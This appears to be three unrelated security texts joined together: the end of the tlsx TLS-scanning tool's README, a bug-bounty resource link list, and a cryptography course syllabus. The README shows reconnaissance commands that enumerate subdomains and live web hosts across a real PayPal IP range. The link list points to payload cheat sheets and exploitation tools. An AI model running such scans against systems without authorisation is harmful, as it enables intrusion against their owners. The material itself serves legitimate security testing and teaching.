173.0.84.104:443 [zootapi.paypal.com] 173.0.84.104:443 [api-aa-3t.paypal.com] 173.0.84.104:443 [uptycsize.paypal.com] ``` For ease of automation, optionally `-resp-only` flag can be used to list only dns names in CLI output. ```console $ echo 173.0.84.0/24 | tlsx -san -cn -silent -resp-only api-aa-3t.paypal.com pilot-payflowpro.paypal.com pointofsale-s.paypal.com uptycshon.paypal.com a.paypal.com adjvendor.paypal.com zootapi.paypal.com api-aa.paypal.com payflowpro.paypal.com pointofsale.paypal.com uptycspay.paypal.com api-3t.paypal.com uptycsize.paypal.com api.paypal.com api-m.paypal.com svcs.paypal.com uptycsven.paypal.com uptycsven.paypal.com a.paypal.com api.paypal.com pointofsale-s.paypal.com pilot-payflowpro.paypal.com ``` **subdomains** obtained from TLS certificates can be further piped to other PD tools for further inspection, here is an example piping tls subdomains to **[dnsx](https://github.com/projectdiscovery/dnsx)** to filter passive subdomains and passing to **[httpx](https://github.com/projectdiscovery/httpx)** to list hosts running active web services. ```console $ echo 173.0.84.0/24 | tlsx -san -cn -silent -resp-only | dnsx -silent | httpx __ __ __ _ __ / /_ / /_/ /_____ | |/ / / __ \/ __/ __/ __ \| / / / / / /_/ /_/ /_/ / | /_/ /_/\__/\__/ .___/_/|_| /_/ v1.2.2 projectdiscovery.io Use with caution. You are responsible for your actions. Developers assume no liability and are not responsible for any misuse or damage. https://api-m.paypal.com https://uptycsize.paypal.com https://api.paypal.com https://uptycspay.paypal.com https://svcs.paypal.com https://adjvendor.paypal.com https://uptycshap.paypal.com https://uptycshon.paypal.com https://pilot-payflowpro.paypal.com https://slc-a-origin-pointofsale.paypal.com https://uptycsven.paypal.com https://api-aa.paypal.com https://api-aa-3t.paypal.com https://uptycsbrt.paypal.com https://payflowpro.paypal.com http://pointofsale-s.paypal.com http://slc-b-origin-pointofsale.paypal.com http://api-3t.paypal.com http://zootapi.paypal.com http://pointofsale.paypal.com ```` ### TLS / Cipher Probe ```console $ subfinder -d hackerone.com | tlsx -tls-version -cipher mta-sts.hackerone.com:443 [TLS1.3] [TLS_AES_128_GCM_SHA256] hackerone.com:443 [TLS1.3] [TLS_AES_128_GCM_SHA256] api.hackerone.com:443 [TLS1.3] [TLS_AES_128_GCM_SHA256] mta-sts.managed.hackerone.com:443 [TLS1.3] [TLS_AES_128_GCM_SHA256] mta-sts.forwarding.hackerone.com:443 [TLS1.3] [TLS_AES_128_GCM_SHA256] www.hackerone.com:443 [TLS1.3] [TLS_AES_128_GCM_SHA256] support.hackerone.com:443 [TLS1.2] [TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256] ``` # TLS Misconfiguration ### Expired / Self Signed / Mismatched / Revoked / Untrusted Certificate A list of host can be provided to tlsx to detect **expired / self-signed / mismatched / revoked / untrusted** certificates. ```console $ tlsx -l hosts.txt -expired -self-signed -mismatched -revoked -untrusted _____ _ _____ __ |_ _| | / __\ \/ / | | | |__\__ \> < |_| |____|___/_/\_\ v0.0.1 projectdiscovery.io [WRN] Use with caution. You are responsible for your actions. [WRN] Developers assume no liability and are not responsible for any misuse or damage. wrong.host.badssl.com:443 [mismatched] self-signed.badssl.com:443 [self-signed] expired.badssl.com:443 [expired] revoked.badssl.com:443 [revoked] untrusted-root.badssl.com:443 [untrusted] ``` ### [JARM](https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a/) TLS Fingerprint ```console $ echo hackerone.com | tlsx -jarm -silent hackerone.com:443 [29d3dd00029d29d00042d43d00041d5de67cc9954cc85372523050f20b5007] ``` ### [JA3](https://github.com/salesforce/ja3) TLS Fingerprint ```console $ echo hackerone.com | tlsx -ja3 -silent hackerone.com:443 [20c9baf81bfe96ff89722899e75d0190] ``` ### JSON Output **tlsx** does support multiple probe flags to query specific data, but all the information is always available in JSON format, for automation and post processing using `-json` output is most convenient option to use. ```console echo example.com | tlsx -json -silent | jq . ``` ```json { "timestamp": "2022-08-22T21:22:59.799053+05:30", "host": "example.com", "ip": "93.184.216.34", "port": "443", "probe_status": true, "tls_version": "tls13", "cipher": "TLS_AES_256_GCM_SHA384", "not_before": "2022-03-14T00:00:00Z", "not_after": "2023-03-14T23:59:59Z", "subject_dn": "CN=www.example.org, O=Internet Corporation for Assigned Names and Numbers, L=Los Angeles, ST=California, C=US", "subject_cn": "www.example.org", "subject_org": [ "Internet Corporation for Assigned Names and Numbers" ], "subject_an": [ "www.example.org", "example.net", "example.edu", "example.com", "example.org", "www.example.com", "www.example.edu", "www.example.net" ], "issuer_dn": "CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US", "issuer_cn": "DigiCert TLS RSA SHA256 2020 CA1", "issuer_org": [ "DigiCert Inc" ], "fingerprint_hash": { "md5": "c5208a47259d540a6e3404dddb85af91", "sha1": "df81dfa6b61eafdffffe1a250240db5d2e6cee25", "sha256": "7f2fe8d6b18e9a47839256cd97938daa70e8515750298ddba2f3f4b8440113fc" }, "tls_connection": "ctls", "sni": "example.com" } ``` ## Configuration ### Scan Mode tlsx provides multiple modes to make TLS Connection - - `auto` (automatic fallback to other modes upon failure) - **default** - `ctls` (**[crypto/tls](https://github.com/golang/go/blob/master/src/crypto/tls/tls.go)**) - `ztls` (**[zcrypto/tls](https://github.com/zmap/zcrypto)**) - `openssl` (**[openssl](https://github.com/openssl/openssl)**) Some pointers for the specific mode / library is highlighted in [linked discussions](https://github.com/projectdiscovery/tlsx/discussions/2), `auto` mode is supported to ensure the maximum coverage and scans for the hosts running older version of TLS by retrying the connection using `ztls` and `openssl` mode upon any connection error. An example of using `ztls` mode to scan website using old / outdated TLS version. ```console $ echo tls-v1-0.badssl.com | tlsx -port 1010 -sm ztls _____ _ _____ __ |_ _| | / __\ \/ / | | | |__\__ \> < |_| |____|___/_/\_\ v0.0.1 projectdiscovery.io [WRN] Use with caution. You are responsible for your actions. [WRN] Developers assume no liability and are not responsible for any misuse or damage. tls-v1-0.badssl.com:1010 ``` ### OpenSSL To use the openssl connection mode, you will need to have openssl installed on your system. Most modern systems come with openssl pre-installed, but if it is not present on your system, you can install it manually. You can check if openssl is installed by running the command `openssl version`. If openssl is installed, this command will display the version number. <table> <tr> <td> ### Pre-Handshake (Early Termination) **tlsx** supports terminating SSL connection early which leads to faster scanning and less connection request (disconnecting after TLS `serverhello` and certificate data is gathered). For more detail, please refer to [Hunting-Certificates-And-Servers](https://github.com/erbbysam/Hunting-Certificates-And-Servers/blob/master/Hunting%20Certificates%20%26%20Servers.pdf) by [@erbbysam](https://twitter.com/erbbysam) An example of using `-pre-handshake` mode: ```console $ tlsx -u example.com -pre-handshake _____ _ _____ __ |_ _| | / __\ \/ / | | | |__\__ \> < |_| |____|___/_/\_\ v0.0.1 projectdiscovery.io [WRN] Use with caution. You are responsible for your actions. [WRN] Developers assume no liability and are not responsible for any misuse or damage. example.com:443 ``` > **Note**: > **pre-handshake** mode utilizes `ztls` (**zcrypto/tls**) which also means the support is limited till `TLS v1.2` as `TLS v1.3` is not supported by `ztls` library. </table> </tr> </td> ### TLS Version **Minimum** and **Maximum** TLS versions can be specified using `-min-version` and `-max-version` flags, as default these value are set by underlying used library. The acceptable values for TLS version is specified below. - `ssl30` - `tls10` - `tls11` - `tls12` - `tls13` Here is an example using `max-version` to scan for hosts supporting an older version of TLS, i.e **TLS v1.0** ```console $ tlsx -u example.com -max-version tls10 _____ _ _____ __ |_ _| | / __\ \/ / | | | |__\__ \> < |_| |____|___/_/\_\ v0.0.1 projectdiscovery.io [WRN] Use with caution. You are responsible for your actions. [WRN] Developers assume no liability and are not responsible for any misuse or damage. example.com:443 ``` ### Custom Cipher Supported custom cipher can provided using `-cipher-input / -ci` flag, supported cipher list for each mode is available at [wiki page](https://github.com/projectdiscovery/tlsx/wiki/Ciphers). ```console $ tlsx -u example.com -ci TLS_AES_256_GCM_SHA384 -cipher ``` ```console $ tlsx -u example.com -ci cipher_list.txt -cipher ``` ## Acknowledgements This program optionally uses: - [zcrypto](https://github.com/zmap/zcrypto) library from the zmap team. - [cfssl](https://github.com/cloudflare/cfssl) library from the cloudflare team - cipher data from [ciphersuite.info](https://ciphersuite.info) for ciphersuite classification -------- <div align="center"> tlsx is made with ❤️ by the [projectdiscovery](https://projectdiscovery.io) team and distributed under [MIT License](LICENSE). <a href="https://discord.gg/projectdiscovery"><img src="https://raw.githubusercontent.com/projectdiscovery/nuclei-burp-plugin/main/static/join-discord.png" width="300" alt="Join Discord"></a> </div>
> בס״ד <div align="center"> <h2 align="center"><a href="https://github.com/Anlominus">⚜️ Aภl๏miuภuຮ ⚜️</a></h2> <img align="center" width="100" src="https://user-images.githubusercontent.com/51442719/172729066-1293d382-4a31-4f03-8c23-ab0ea5f611a0.png"> ⫷ [**`HacKingPro`**](https://github.com/Anlominus/HacKingPro) ⫸ <br> ⫷ [**`TryHackMe`**](https://github.com/Anlominus/TryHackMe) | [**`KoTH`**](https://github.com/Anlominus/TryHackMe/tree/main/King%20of%20the%20Hill/KoTH) ⫸ <br> ⫷ [**`Privilege-Escalation`**](https://github.com/Anlominus/Privilege-Escalation)⫸ <br> ⫷ [**`ScanPro`**](https://github.com/Anlominus/ScanPro) | [**`Linfo`**](https://github.com/Anlominus/Linfo) | [**`Diablo`**](https://github.com/Anlominus/Diablo) ⫸ <br> ⫷ [**`Offensive-Security`**](https://github.com/Anlominus/Offensive-Security) | [**`PenTest`**](https://github.com/Anlominus/PenTest) ⫸ <br> ⫷ [**`Goals`**](https://github.com/Anlominus/Goals) | [**`Studies`**](https://github.com/Anlominus/Studies) | [**`HacKing`**](https://github.com/Anlominus/HacKing) | [**`AnyTeam`**](https://github.com/Anlominus/AnyTeam) ⫸ <br> ![image](https://user-images.githubusercontent.com/51442719/177962269-3ffc9f78-e516-4459-9719-c1b52a5e3acc.png) </div> --- # Bug Bounty > - [Awesomes](#Awesomes) > - [Books](#Books) > - [Cheatsheets](#Cheatsheets) > - [Checklists](#Checklists) > - [Tools](#Tools) > - [Wordlists](#Wordlists) > - [More](#More) --- ## [GitHub Bounty](https://bounty.github.com/) > ## GitHub Security Bug Bounty > ### Software security researchers are increasingly engaging with internet companies to hunt down vulnerabilities. > ### Our bounty program gives a tip of the hat to these researchers and provides rewards of $30,000 or more for critical vulnerabilities. # Awesomes - ## [Awesome Bug Bounty Tools](https://github.com/Anlominus/Bug-Bounty/blob/main/Awesome/Awesome%20Bug%20Bounty%20Tools.md) > ### A curated list of various bug bounty tools > https://github.com/vavkamil/awesome-bugbounty-tools - ## [Awesome Bug Bounty](https://github.com/djadmin/awesome-bug-bounty) > A comprehensive curated list of Bug Bounty Programs and write-ups from the Bug Bounty hunters. - ## [Awesome CTF](https://github.com/apsdehal/awesome-ctf) > ### A curated list of `Capture The Flag` (`CTF`) frameworks, libraries, resources, softwares and tutorials. This list aims to help starters as well as seasoned CTF players to find everything related to CTFs at one place. - ## [Awesome Bug Bounty Builder](https://github.com/0xJin/awesome-bugbounty-builder) > ### Awesome Bug bounty builder Project - ALL common Tools for find your Vulnerabilities. > ![image](https://user-images.githubusercontent.com/51442719/174515020-8d952fcc-7385-4a41-9e5d-2d388baf953d.png) --- # Books - ## [Hacking-Books](https://github.com/zapstiko/Hacking-PDF) Here Are Some Popular Hacking PDF - ## [The Threat Hunter Playbook](https://github.com/OTRF/ThreatHunter-Playbook) ~ The Threat Hunter Playbook - ![image](https://user-images.githubusercontent.com/51442719/174491587-cd272b9e-aef8-4e43-9020-3dab10d54003.png) > The Threat Hunter Playbook is a community-driven, open source project to share detection logic, adversary tradecraft and resources to make detection development more efficient. All the detection documents in this project follow the structure of MITRE ATT&CK categorizing post-compromise adversary behavior in tactical groups and are available in the form of interactive notebooks. The use of notebooks not only allow us to share text, queries and expected output, but also code to help others run detection logic against pre-recorded security datasets locally or remotely through BinderHub cloud computing environments. --- # Cheatsheets - ## [Bug Bounty Cheat Sheet](https://github.com/EdOverflow/bugbounty-cheatsheet) > ### A list of interesting payloads, tips and tricks for bug bounty hunters. - ## [Bug Bounty Cheat Sheet](https://github.com/EdOverflow/bugbounty-cheatsheet) > A list of interesting payloads, tips and tricks for bug bounty hunters. --- # Cheacklists - ## [Galaxy-Bugbounty-Checklist](https://github.com/0xmaximus/Galaxy-Bugbounty-Checklist) <br> > ### Tips and Tutorials for Bug Bounty and also Penetration Tests. --- # Tools - ## [Bug Bounty Methodology & Tools](https://github.com/blackhatethicalhacking/bugbountytools-methodology) > ### Here are some of the tools that we use when we perform Live Recon Passive ONLY on Twitch: 1) Recon-ng https://github.com/lanmaster53/recon-ng 2) httpx https://github.com/projectdiscovery/httpx 3) isup.sh https://github.com/gitnepal/isup 4) Arjun https://github.com/s0md3v/Arjun 5) jSQL https://github.com/ron190/jsql-injection 6) Smuggler https://github.com/defparam/smuggler 7) Sn1per https://github.com/1N3/Sn1per 8) Spiderfoot https://github.com/smicallef/spiderfoot 9) Nuclei https://github.com/projectdiscovery/nuclei 10) Jaeles https://github.com/jaeles-project/jaeles 11) ChopChop https://github.com/michelin/ChopChop 12) Inception https://github.com/proabiral/inception 13) Eyewitness https://github.com/FortyNorthSecurity/EyeWitness 14) Meg https://github.com/tomnomnom/meg 15) Gau - Get All Urls https://github.com/lc/gau 16) Snallygaster https://github.com/hannob/snallygaster 17) NMAP https://github.com/nmap/nmap 18) Waybackurls https://github.com/tomnomnom/waybackurls 19) Gotty https://github.com/yudai/gotty 20) GF https://github.com/tomnomnom/gf 21) GF Patterns https://github.com/1ndianl33t/Gf-Patterns 22) Paramspider https://github.com/devanshbatham/ParamSpider 23) XSSER https://github.com/epsylon/xsser 24) UPDOG https://github.com/sc0tfree/updog 25) JSScanner https://github.com/dark-warlord14/JSScanner 26) Takeover https://github.com/m4ll0k/takeover 27) Keyhacks https://github.com/streaak/keyhacks 28) S3 Bucket AIO Pwn https://github.com/blackhatethicalhacking/s3-buckets-aio-pwn 29) BHEH Sub Pwner Recon https://github.com/blackhatethicalhacking/bheh-sub-pwner 30) GitLeaks https://github.com/zricethezav/gitleaks 31) Domain-2IP-Converter https://github.com/blackhatethicalhacking/Domain2IP-Converter 32) Dalfox https://github.com/hahwul/dalfox 33) Log4j Scanner https://github.com/Black-Hat-Ethical-Hacking/log4j-scan 34) Osmedeus https://github.com/j3ssie/osmedeus 35) getJS https://github.com/003random/getJS - ## [BugDog](https://github.com/M4xSec/BugDog) > ### A Powerfull BUG HUNTING TOOL. Supports SQL, XSS, PHP code execution, SSRF,.... I had Appended My Own Payloads which I had founded during my BUG Hunting Rest You can add Your CUSTOM payloads too ;) > ![image](https://user-images.githubusercontent.com/51442719/174846835-7ca2ee10-92ef-408e-9e16-a1ac04c5c107.png) > - ### NOTE: BugDog is made with python and requires python2 to run perfectly. - ## [Bug-Bounty-Tools](https://github.com/daffainfo/Bug-Bounty-Tools): Random Tools for Bug Bounty - ## [BigBountyRecon](https://github.com/Viralmaniar/BigBountyRecon) > ### BigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation. - ![image](https://user-images.githubusercontent.com/51442719/173207844-0c15a4ae-f7af-4733-a82d-6dd49873d087.png) - ## [Hack-Pet](https://github.com/hahwul/hack-pet): > ### hack-pet is collection of command snippets that are useful to hackers/bug bounty hunters. <br> > ### It is similar to the recon_profile, but it uses the pet. pet can manage the command set more progressively. <br> > ![image](https://user-images.githubusercontent.com/51442719/173320602-a127a785-8833-4af6-bbe1-dd05e6008fee.png) <br> > ![image](https://user-images.githubusercontent.com/51442719/173320551-b871c846-be09-4d24-9005-e5a3a8e72d1b.png) - ## [CTF-tool](https://github.com/SandySekharan/CTF-tool) > A curated list of Capture The Flag (CTF) frameworks, libraries, resources and softwares. - ## [Bug bounty toolkit](https://github.com/sehno/Bug-bounty/blob/master/bugbounty_toolkit.md) > ### Here you can find a list of differents tools that you can use in bug bounty or pentesting. > #### Some categories and tools will be added as we go. > #### If you have questions or suggestions, don't hesitate to contact me on twitter (https://twitter.com/_sehno_) - ## [BugHuntingToolKit](https://github.com/krishpranav/BugHuntingToolKit) > ### This Is A Tool For Bug Hunters in this tool i have included the tools which bug hunters use > ![](https://github.com/krishpranav/BugHuntingToolKit/raw/master/Bug.gif) - ## [Parrots Recon](https://github.com/parrotassassin15/parrot-recon) > ### Recon Automation for BugBounties - ## [OK-VPS](https://github.com/mrco24/OK-VPS) > ![image](https://user-images.githubusercontent.com/51442719/174768684-043fcd77-991d-42d8-bf2b-9aca2eec5825.png) > ### Bug Bounty Vps Setup Tools Installer > #### With these tools you can install most of the bug bounty tools with just one command and The tool has been modified and spelled many tools ## special thanks @supr4s Because most of these tools modify his tools - ## [kali-repos](https://github.com/samirettali/kali) > ### Kali Linux containers for bug bounty and CTFs - ## [Bot-Bounty](https://github.com/Drayko/Bot-Bounty) > ### Python Script for Telegram Bot is specially built for pentest & bug bounty. It's like a telegram shell. > #### You will be notified when your task(command line) is finished with results. This bot make long time tasks by you, taking off the need of your attention if it's finished. > ![image](https://user-images.githubusercontent.com/51442719/174773861-5271f931-18b8-46bc-b088-0ee7e1277a03.png) <br> > ![image](https://user-images.githubusercontent.com/51442719/174773924-4e2f431b-ac2a-4dbf-9e93-114947b2892a.png) <br> - ### Subdomains recon - [amass](https://github.com/OWASP/Amass) - [subfinder](https://github.com/projectdiscovery/subfinder) - [assetfinder](https://github.com/tomnomnom/assetfinder) - [dnsgen](https://github.com/ProjectAnte/dnsgen) - [shuffledns](https://github.com/projectdiscovery/shuffledns) - [httprobe](https://github.com/tomnomnom/httprobe) - [aquatone](https://github.com/michenriksen/aquatone) - ### Manual recon - [shodan](https://www.shodan.io/) - [censys](https://censys.io/) - [google dorks](https://www.google.com) - [pastebin](https://pastebin.com/) - [github](https://github.com) - ### Enumeration / Crawling - [nmap](https://nmap.org/download.html) - [ffuf](https://github.com/ffuf/ffuf) - [hakrawler](https://github.com/hakluke/hakrawler) - [gau](https://github.com/lc/gau) - [paramspider](https://github.com/devanshbatham/ParamSpider) - [arjun](https://github.com/s0md3v/Arjun) - [parameth](https://github.com/maK-/parameth) - ### XSS - [xsshunter](https://xsshunter.com) - [xsscrapy](https://github.com/DanMcInerney/xsscrapy) - [dalfox](https://github.com/hahwul/dalfox) - ### SQL Injection - [sqlmap](https://github.com/sqlmapproject/sqlmap) - [waybacksqliscanner](https://github.com/ghostlulzhacks/waybackSqliScanner) --- # Wordlists - ## [Bug-Bounty-Wordlists](https://github.com/Karanxa/Bug-Bounty-Wordlists) > ### A repository that includes all the important wordlists used while bug hunting. - ## [a-full-list-of-wordlists](https://github.com/SilverPoision/a-full-list-of-wordlists/tree/master/Wordlists/burp_pack) > ### this contain the burp pack - ## [FuzzDB](https://github.com/fuzzdb-project/fuzzdb) > FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. It's the first and most comprehensive open dictionary of fault injection patterns, predictable resource locations, and regex for matching server responses. - ## [wordlist-tools](https://github.com/shifty0g/wordlist-tools) > A set of tools for making life easier with wordlists --- # More - ## [The Bug Hunter's Methodology (TBHM)](https://github.com/jhaddix/tbhm) > related to web application security assessments and more specifically towards bug hunting in bug bounties. - ## [Galaxy-Bugbounty-Checklist](https://github.com/0xmaximus/Galaxy-Bugbounty-Checklist): > Tips and Tutorials for Bug Bounty and also Penetration Tests. - ## [HowToHunt](https://github.com/KathanP19/HowToHunt) > Tutorials and Things to Do while Hunting Vulnerability. - ## [Awesome-Bugbounty-Writeups](https://github.com/devanshbatham/Awesome-Bugbounty-Writeups) > A curated list of bugbounty writeups (Bug type wise) , inspired from https://github.com/ngalongc/bug-bounty-reference - ## [AllAboutBugBounty](https://github.com/daffainfo/AllAboutBugBounty) > All about bug bounty (bypasses, payloads, and etc) - ## [HolyTips](https://github.com/HolyBugx/HolyTips) > ### A Collection of Notes, Checklists, Writeups on Bug Bounty Hunting and Web Application Security. - ## [KingOfBugBountyTips](https://github.com/KingOfBugbounty/KingOfBugBountyTips) <br> > ### Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. - ## [Resources-for-Beginner-Bug-Bounty-Hunters](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters): > ###A list of resources for those interested in getting started in bug bounties > ## Table of Contents > - [Basics](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/blob/master/assets/basics.md) > - [Setup](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/blob/master/assets/setup.md) > - [Tools](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/blob/master/assets/tools.md) > - [Labs & Testing Environments](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/blob/master/assets/labs.md) > - [Talks](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/blob/master/assets/talks.md) > - [Vulnerability Types](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/blob/master/assets/vulns.md) > - [Mobile Hacking](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/blob/master/assets/mobile.md) > - [Smart Contracts](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/blob/master/assets/smartcon.md) > - [Coding & Scripting](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/blob/master/assets/coding.md) > - [Hardware & IoT](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/blob/master/assets/hardware.md) > - [Blog posts & Talks](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/blob/master/assets/blogposts.md) > - [Media Resources](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/blob/master/assets/media.md) > - [Certifications](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/blob/master/assets/certs.md) > - [Mindset & Mental Health](https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters/blob/master/assets/health.md) --- <h2 align="center"> **[`^ Back to TOP ^`](#%EF%B8%8F-aภlmiuภuຮ-%EF%B8%8F)** </h2>
# Cryptography Fundamentals course (now with some AppSec) ## Details Most of the content (and lecture recordings) are on Moodle but I'm adding a list of topics & some resources here for anyone who wants to quickly browse them. ## Book/Tutorial Recommendations * Serious Cryptography - JP Aumasson (Available as ebook at the library): https://nostarch.com/seriouscrypto * Crypto101 - lvh: https://www.crypto101.io/ * Cryptography Engineering - Ferguson, Schneier, Kohno: https://www.schneier.com/books/cryptography-engineering * Security Engineering - Ross Anderson: https://www.cl.cam.ac.uk/~rja14/book.html * Engineering Security - Peter Gutmann: https://www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf * Manga Guide to Cryptography - Mitano, Sato, Hinaki: https://nostarch.com/mangacrypto * The Codebreakers - David Kahn: https://archive.org/details/B-001-001-264 * Violent Python - TJ O'Connor (Uses old Python 2 so contact me for help updating small bits of the code): https://www.oreilly.com/library/view/violent-python/9781597499576/ * Programiz Python Tutorial: https://www.programiz.com/python-programming * NSA Python Training Document (skip to Lesson 02): https://archive.org/details/comp3321 * Automate the Boring Stuff (Python): https://automatetheboringstuff.com/ * [Effective C - Robert Seacord (2020)](https://nostarch.com/Effective_C) - Beginner/Intermediate * [Beej's Guide to C Programming (2021)](http://beej.us/guide/bgc/) - Intermediate * [Modern C - Jens Gustedt (2019)](https://modernc.gforge.inria.fr/) - Intermediate/Advanced * [SEI CERT C Coding Standard](https://wiki.sei.cmu.edu/confluence/display/c/SEI+CERT+C+Coding+Standard) - Intermediate/Secure Coding Guidelines * [Hacking - The Art of Exploitation by Jon Erickson (2008)](https://nostarch.com/hacking2.htm) - Advanced: includes a bunch of source code ## YouTube Channels ### People * Computerphile: https://www.youtube.com/channel/UC9-y-6csu5WGm29I7JiwpnA * STÖK: https://www.youtube.com/c/STOKfredrik/ * LiveOverflow: https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w * Bill Buchanan: https://www.youtube.com/user/billatnapier * Professor Messer: https://www.youtube.com/channel/UCkefXKtInZ9PLsoGRtml2FQ * Tib3rius: https://www.youtube.com/channel/UCs6dtu4e0JL-N4hVszsFpBw * NetworkChuck: https://www.youtube.com/user/NetworkChuck * John Hammond: https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw * Jim Browning: https://www.youtube.com/c/JimBrowning * Null Byte: https://www.youtube.com/channel/UCgTNupxATBfWmfehv21ym-g * IppSec: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA * HackerSploit: https://www.youtube.com/c/HackerSploit/videos * Marcus Hutchins: https://www.youtube.com/channel/UCLDnEn-TxejaDB8qm2AUhHQ * CryptoCat: https://www.youtube.com/channel/UCEeuul0q7C8Zs5C8rc4REFQ ### Podcasts * Darknet Diaries: https://darknetdiaries.com/ * Risky Business: https://risky.biz/netcasts/risky-business/ * Unsupervised Learning / Daniel Miessler: https://danielmiessler.com/podcast/ * StormCast: https://isc.sans.edu/podcast.html ### Conferences * DEFCON: https://www.youtube.com/channel/UC6Om9kAkl32dWlDSNlDS9Iw * CCC (some videos in German): https://www.youtube.com/user/mediacccde * OWASP NZ: https://www.youtube.com/channel/UCWjcSSETjqhzBlVxXTW1zhg * PyVideo (Python Conferences): https://pyvideo.org/ * BSides Canberra: https://www.youtube.com/channel/UCbgRw_yk53hVtNXEX2DtyDQ * BSides London: https://www.youtube.com/channel/UCXXNOelGiY_N96a2nfhcaDA * BSides Capetown: https://www.youtube.com/channel/UCf3DodO2LfdbtHywUpI-nPA * ShmooCon: https://www.youtube.com/c/0xdade/videos * BlackHat: https://www.youtube.com/c/BlackHatOfficialYT/videos * Hack.lu: https://www.youtube.com/channel/UCI6B0zYvK-7FdM0Vgh3v3Tg/videos * CISA: https://www.youtube.com/channel/UCxyq9roe-npgzrVwbpoAy0A * RSA: https://www.youtube.com/c/RSAConference/videos ## Communities * [/r/crypto](https://reddit.com/r/crypto) * [crypto StackExchange](https://crypto.stackexchange.com/) * [/r/netsec](https://reddit.com/r/netsec) * [/r/reverseengineering](https://reddit.com/r/reverseengineering) * [HackerNews](https://news.ycombinator.com) * Often primarily startup/programming related, but occasionally has good links and discussion on security topics. ## Week 1 ### Topics: * History * Classical Ciphers * XOR * GitHub * Kali * Python Basics * [cryptii.com](https://cryptii.com/) - Website with many interactive ciphers/encoding. * [GCHQ CyberChef](https://gchq.github.io/CyberChef/) * [repl.it](https://repl.it/) - Online code editor ## Week 2 ### Topics * Binary * ASCII * Hexadecimal * Attack Model * Kerckhoff's Principle * Python's Cryptography Library * [Python - cryptography](https://cryptography.io/en/latest/) - Cryptography library for Python ## Week 3 ### Topics * Padding, Cribs, and NSA Archive on Archive.org * Key Reuse with One-Time Pad * Frequency Analysis & Classical Cipher Example * Cryptanalysis Attack Models/Types * JetBrains IDEs & PyCharm * Kali Linux & VirtualBox * Randomness & Pseudo-Random Number Generators (PRNGs) * Confusion & Diffusion * Ciphertext Indistinguishability (IND) and Non-Malleability (NM) * ARX (Add-Rotate-XOR) Ciphers * S-Boxes (Substitution) and P-Boxes (Permutation) ## Week 4 ### Topics * ARX Ciphers continued * Block Ciphers * P-Boxes, S-Boxes, Substitution-Permutation Networks (SP Network) * Parity Bits * Question about VPNs * Feistel Networks * DES - Data Encryption Standard, DES-X & Key whitening, Triple-DES aka 3DES * AES - Advanced Encryption Standard * Block Cipher Modes of Operation ## Week 5 ### Topics * Confidentiality * Block Cipher Modes of Operation (Confidentiality-only): ECB, CBC, CTR, OFB, CFB. * Stream Ciphers * Nonce: Number-used-only-ONCE. * Cryptographic Oracle & Oracle Attack * Integrity: Parity Bits (revision), Check-Digits, Checksums * Common Vulnerabilities & Exposures (CVE) * Hashing (brief overview - more to come) * Message Authentication Codes (brief overview - more to come) * Dates, Time, and Timezones (Answering question from student) * Sockets & Netcat (brief overview - more to come) * Threading (brief overview - more to come) ## Week 6 - No Classes due to Easter Holidays ## Week 7 * Netcat * UNIX: /etc/services & ports, less, pipes * Hex Editors & Assembly Language Basics * UNIX: Manpages, Keyboard Shortcuts / Signals, System Calls, /proc * Library Security & Supply Chain Attacks * Sockets with Python / Homework Review * Netcat & Reverse Shells * HTTP, curl, Requests & Responses * Python: Classes & Files * Mirai Botnet Quick Code Review * CTFs & upcoming HackTheBox Cryptapocalypse ## Week 8 ### Topics * Message Authentication Codes * Authenticated Encryption (AE) * Hashing & Passwords * Diffie-Hellman Key Exchange * Public Key Cryptography ## Week 9 ### Topics - Week 8 topics in more detail * Message Authentication Codes * Authenticated Encryption (AE) * Hashing & Passwords: SHA2, SHA3, bcrypt, scrypt, Argon2 * Diffie-Hellman Key Exchange * Public Key Cryptography ## Week 10 ### Topics * RSA * Elliptic Curve Cryptography (ECC) & ECDH * Computational Hardness: Integer Factoring & Discrete Log * Digital Signatures & Non-repudiation * Public Key Infrastructure (PKI) * Transport Layer Security (TLS) ## Week 11 ### Topics * Web Security Basics * APIs * OAuth * OWASP Top 10 * Containers ## Week 12 ### Topics * More UNIX: processes/suspending with ctrl-z, bg/fg, grep, tr, cut, awk, sed: https://blog.knoldus.com/play-with-text-in-linux-grep-cut-awk-sed/ * Scope: https://en.wikipedia.org/wiki/Scope_(computer_science) * Reading/writing files & with statement (context managers): https://www.programiz.com/python-programming/file-operation * Bytes & endianness: Converting to and from bytes, and endianness. https://en.wikipedia.org/wiki/Endianness Using pycryptodome and other libraries: https://www.pycryptodome.org/en/latest/src/examples.html & https://github.com/vinta/awesome-python Unit Testing Basics & pytest: https://dev.to/edeediong/understanding-pytest-1e0p Regular Expressions: http://regextutorials.com/index.html Static Analysis Basics: pylint, mypy: 